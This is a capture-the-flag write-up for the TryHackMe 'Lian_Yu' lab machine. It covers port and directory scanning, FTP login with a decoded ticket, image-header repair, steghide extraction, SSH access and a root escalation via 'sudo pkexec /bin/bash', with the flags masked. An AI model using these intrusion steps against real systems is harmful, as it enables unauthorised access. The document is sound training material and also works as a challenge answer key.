7 minutes
THM: Lian_Yu
Title:Lian_Yu
Description:A beginner level security challenge
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.158.146 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 14:21 BST
Nmap scan report for 10.10.158.146
Host is up (0.026s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37797/udp6 status
| 100024 1 38837/tcp6 status
| 100024 1 45522/udp status
|_ 100024 1 60402/tcp status
60402/tcp open status 1 (RPC #100024)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.76 seconds
Website
The inital website is just a static page that doesnt really give anything way, so we run a gobuster scan.
# gobuster dir -u http://10.10.158.146 -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.158.146
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/island (Status: 301) [Size: 236] [--> http://10.10.158.146/island/]
/server-status (Status: 403) [Size: 199]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
Visiting the island directory shows us a basic message with a “hidden” code word in white text.
We run another gobuster scan which finds another directory. Checking this site gives us another clue in the source code.
# gobuster dir -u http://10.10.158.146/island/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.158.146/island/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/2100 (Status: 301) [Size: 241] [--> http://10.10.158.146/island/2100/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
We run another gobuster scan in this directory, but this time with the .ticket extension. This finds us another page.
# gobuster dir -u http://10.10.158.146/island/2100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.158.146/island/2100/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: ticket
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/green_arrow.ticket (Status: 200) [Size: 71]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================
FTP
After a bit of trial an error in cyberchef we work out the ticket was encoded as Base58. Using this as the password and the discovered username from earlier we can login to the FTP service. There are 3 files and we download them all. We also see if we can navigate to anywhere else - we can, however the only useful information we reveal is there is another user called slade
# ftp -A 10.10.158.146
Connected to 10.10.158.146.
220 (vsFTPd 3.0.2)
Name (10.10.158.146:root): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 511720 May 01 2020 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 2020 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 2020 aa.jpg
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwx------ 2 1000 1000 4096 May 01 2020 slade
drwxr-xr-x 2 1001 1001 4096 May 05 2020 vigilante
Looking through the accuired images we can see that aa.jpg and Queen's_Gambit.png both open normally, however the Leave_me_alone.png file is not even detected as a valid image. Digging deeper into the file we can see the magic bytes are wrong at the start of the file.
# xxd Queen\'s_Gambit.png| head
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
00000010: 0000 0500 0000 02d0 0806 0000 00cf 7ddd ..............}.
00000020: 5600 0000 0173 5247 4200 aece 1ce9 0000 V....sRGB.......
00000030: 0159 6954 5874 584d 4c3a 636f 6d2e 6164 .YiTXtXML:com.ad
00000040: 6f62 652e 786d 7000 0000 0000 3c78 3a78 obe.xmp.....<x:x
00000050: 6d70 6d65 7461 2078 6d6c 6e73 3a78 3d22 mpmeta xmlns:x="
00000060: 6164 6f62 653a 6e73 3a6d 6574 612f 2220 adobe:ns:meta/"
00000070: 783a 786d 7074 6b3d 2258 4d50 2043 6f72 x:xmptk="XMP Cor
00000080: 6520 352e 342e 3022 3e0a 2020 203c 7264 e 5.4.0">. <rd
00000090: 663a 5244 4620 786d 6c6e 733a 7264 663d f:RDF xmlns:rdf=
# xxd Leave_me_alone.png | head
00000000: 5845 6fae 0a0d 1a0a 0000 000d 4948 4452 XEo.........IHDR
00000010: 0000 034d 0000 01db 0806 0000 0017 a371 ...M...........q
00000020: 5b00 0020 0049 4441 5478 9cac bde9 7a24 [.. .IDATx....z$
00000030: 4b6e 2508 33f7 e092 6466 dea5 557b 6934 Kn%.3...df..U{i4
00000040: 6a69 54fd f573 cebc c03c 9c7e b4d4 a556 jiT..s...<.~...V
00000050: 4955 75d7 5c98 5c22 c2dd 6c3e 00e7 c0e0 IUu.\.\"..l>....
00000060: 4e66 a94a 3d71 3f5e 32c9 085f cccd 60c0 Nf.J=q?^2.._..`.
00000070: c1c1 41f9 7ffe dfff bb2f eb22 fab5 aeab ..A....../."....
00000080: 7d9d cfe7 f81e 5fcb 49ce ed94 7eb7 d8d7 }....._.I...~...
00000090: 723c c9e9 7492 d3d3 494e c793 9c8f 8b2c r<..t...IN.....,
With a bit of hex editing we can repair the file to make sure it has the correct header. Once we have done this, it opens normally and reveals a password. We try running steghide against the jpg image using the password we have just found and it gives us a zip file.
# steghide extract -sf aa.jpg
Enter passphrase:
wrote extracted data to "ss.zip".
Unzipping this fives us 2 more files one of which looks like a password.
# unzip ss.zip
Archive: ss.zip
inflating: passwd.txt
inflating: shado
# cat passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.
# cat shado
M*******n
Using this password with the other account we know exists to logon to SSH gets us the user flag.
# ssh slade@10.10.158.146
slade@10.10.158.146's password:
Way To SSH...
Loading.........Done..
Connecting To Lian_Yu Happy Hacking
██╗ ██╗███████╗██╗ ██████╗ ██████╗ ███╗ ███╗███████╗██████╗
██║ ██║██╔════╝██║ ██╔════╝██╔═══██╗████╗ ████║██╔════╝╚════██╗
██║ █╗ ██║█████╗ ██║ ██║ ██║ ██║██╔████╔██║█████╗ █████╔╝
██║███╗██║██╔══╝ ██║ ██║ ██║ ██║██║╚██╔╝██║██╔══╝ ██╔═══╝
╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗███████╗
╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝
██╗ ██╗ █████╗ ███╗ ██╗ ██╗ ██╗██╗ ██╗
██║ ██║██╔══██╗████╗ ██║ ╚██╗ ██╔╝██║ ██║
██║ ██║███████║██╔██╗ ██║ ╚████╔╝ ██║ ██║
██║ ██║██╔══██║██║╚██╗██║ ╚██╔╝ ██║ ██║
███████╗██║██║ ██║██║ ╚████║███████╗██║ ╚██████╔╝
╚══════╝╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═════╝ #
slade@LianYu:~$ ls
user.txt
slade@LianYu:~$ cat user.txt
THM{P**********************************T}
--Felicity Smoak
Privilege escalation
Checking the rights we have we see we can run pkexec with sudo. That gives us a very simple escalation to root and the flag
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
slade@LianYu:~$ sudo pkexec /bin/bash
root@LianYu:~# ls
root.txt
root@LianYu:~# cat root.txt
Mission accomplished
You are injected me with Mirakuru:) ---> Now slade Will become DEATHSTROKE.
THM{M************************************************************************************D}
--DEATHSTROKE
Let me know your comments about this machine :)
I will be available @twitter @User6825